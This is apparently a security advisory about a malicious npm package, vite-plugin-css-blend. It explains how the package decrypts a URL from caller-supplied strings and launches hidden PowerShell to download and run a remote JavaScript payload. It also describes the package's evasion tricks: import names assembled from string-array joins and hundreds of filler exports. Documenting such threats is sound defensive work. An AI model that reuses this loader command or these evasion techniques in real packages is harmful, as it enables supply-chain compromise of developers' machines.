npm · Malicious package advisory
Malwarevite-plugin-css-blend
MAL-2026-4706
Malicious code in vite-plugin-css-blend (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7a47fa75fbd028d1aca89ca790036f760c76d8e486175505ef4a8f59f33e7c76)
The package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented `applyGlobalStyles({palette, accents})` export, when called on Windows, treats the caller-supplied `accents` and `palette` strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns `powershell.exe -WindowStyle Hidden -NoProfile -Command "irm <decrypted-url> -o $env:TEMP\s.js; node $env:TEMP\s.js"` — fetching and executing an attacker-controlled JavaScript payload via Node. The `node:crypto` and `node:child_process` modules are imported via string-array join (`["no","de",":","cry","pto"].join("")`, `["no","de",":","chi","ld","_pro","cess"].join("")`) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., `isWithinBoundary1..200`, `applyPreset1..150`, `createSequenceStep1..250`) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.
Compromised versions (1)
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.